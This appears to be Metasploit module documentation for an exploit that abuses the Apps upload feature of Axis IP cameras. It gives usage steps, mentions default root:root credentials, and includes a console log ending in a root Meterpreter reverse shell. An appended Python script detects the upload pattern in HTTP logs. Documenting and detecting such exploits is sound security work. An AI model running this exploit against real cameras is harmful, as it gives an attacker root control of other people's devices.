Vulnerable Application
Description
This module exploits the "Apps" feature in Axis IP cameras. The feature allows third-party developers to upload and execute 'eap' applications on the device. The system does not validate that the application comes from a trusted source, so an attacker can upload and execute arbitrary code. The issue has no CVE, although the technique was made public in 2018.
This module uploads and executes a stageless Meterpreter payload as root via the application upload feature. The module will also uninstall the application upon completion. Uploading the application requires valid credentials. The default administrator credentials used to be root:root, but newer firmware versions force users to provide a new password for the root user.
The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021). All devices that support the "Apps" feature are presumed to be vulnerable at this time.
Installation
Axis cameras are physical devices and aren't known to have been successfully emulated. However, if you have a device, affected firmware can be downloaded from:
A free account is required to navigate the site but you can download specific firmware without authentication. For example, the latest version for the Axis M3044-V can be downloaded here:
Verification Steps
- Acquire an affected device
- Do: use exploit/linux/http/axis_app_install
- Do: set RHOST <ip>
- Do: set PASSWORD <password>
- Do: check
- Verify the remote target is flagged as vulnerable
- Do: set LHOST <ip>
- Do: exploit
- You should get a Meterpreter session.
Options
USERNAME
The username to authenticate to the web server with. The default value is "root".
PASSWORD
The password to authenticate to the web server with. The default value is "root".
Scenarios
Axis M3044-V using firmware 9.80.3.8. Get Meterpreter session.
msf6 > use exploit/linux/http/axis_app_install
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/axis_app_install) > set RHOST 192.168.1.183
RHOST => 192.168.1.183
msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.220
LHOST => 192.168.1.220
msf6 exploit(linux/http/axis_app_install) > set password labpass1
password => labpass1
msf6 exploit(linux/http/axis_app_install) > check
[*] 192.168.1.183:80 - The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
msf6 exploit(linux/http/axis_app_install) > run
[*] Started reverse TCP handler on 192.168.1.220:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
[*] Creating an application package named: sey
[*] Sending an application upload request to /axis-cgi/packagemanager.cgi
[+] Application installed. Pausing 5 seconds to let the filesystem sync.
[+] Deleted /etc/systemd/system/sey.service
[*] Meterpreter session 1 opened (192.168.1.220:4444 -> 192.168.1.183:60298 ) at 2022-02-14 17:30:51 -0800
[*] Sending a delete application request to /axis-cgi/applications/control.cgi
meterpreter > getuid
Server username: root
meterpreter > shell
Process 16666 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
cat /proc/cpuinfo
processor : 0
model name : ARMv7 Processor rev 1 (v7l)
BogoMIPS : 156.00
Features : half thumb fastmult vfp edsp neon vfpv3 tls vfpd32
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x4
CPU part : 0xc09
CPU revision : 1
Hardware : Ambarella S2L (Flattened Device Tree)
Revision : 0000
Serial : 0000000000000000
pwd
/
exit
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.1.183 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(linux/http/axis_app_install) >
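
For defenders, the two requests visible in the output above (an upload to /axis-cgi/packagemanager.cgi followed seconds later by a request to /axis-cgi/applications/control.cgi) form a pattern that can be searched for in HTTP logs. The script below is an added example, not part of the module or its documentation; it assumes requests to the camera are recorded in combined-log format by a proxy or HTTP sensor, and the sample lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines (assumed combined-log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - root [14/Feb/2022:17:30:40 -0800] "POST /axis-cgi/packagemanager.cgi HTTP/1.1" 200 31
192.0.2.10 - root [14/Feb/2022:17:30:52 -0800] "POST /axis-cgi/applications/control.cgi HTTP/1.1" 200 12
192.0.2.77 - root [14/Feb/2022:09:00:00 -0800] "POST /axis-cgi/packagemanager.cgi HTTP/1.1" 200 31
192.0.2.77 - root [15/Feb/2022:11:00:00 -0800] "POST /axis-cgi/applications/control.cgi HTTP/1.1" 200 12
192.0.2.50 - root [14/Feb/2022:10:00:00 -0800] "GET /index.html HTTP/1.1" 200 900
"""

# Client IP, timestamp, method and path (query string excluded).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>[^ ?"]+)')
INSTALL = "/axis-cgi/packagemanager.cgi"         # upload endpoint shown on this page
CONTROL = "/axis-cgi/applications/control.cgi"   # delete-request endpoint shown on this page

def find_install_then_control(log_text, window=timedelta(minutes=5)):
    """Return (ip, upload_time, control_time) for each package upload that the
    same client follows with an application control request within `window`."""
    pending = {}  # client ip -> time of its most recent package upload
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"]
        if path == INSTALL and m["method"] == "POST":
            pending[ip] = ts
        elif path == CONTROL and ip in pending:
            uploaded = pending.pop(ip)
            if ts - uploaded <= window:
                hits.append((ip, uploaded.isoformat(), ts.isoformat()))
    return hits

if __name__ == "__main__":
    for ip, up, ctl in find_install_then_control(SAMPLE_LOG):
        print(f"ALERT {ip}: package upload at {up}, control request at {ctl}")
```

The match is on paths only, so an administrator who installs an application and immediately starts or removes it will also be flagged. Treat a hit as a lead to triage against change records, not as proof of compromise.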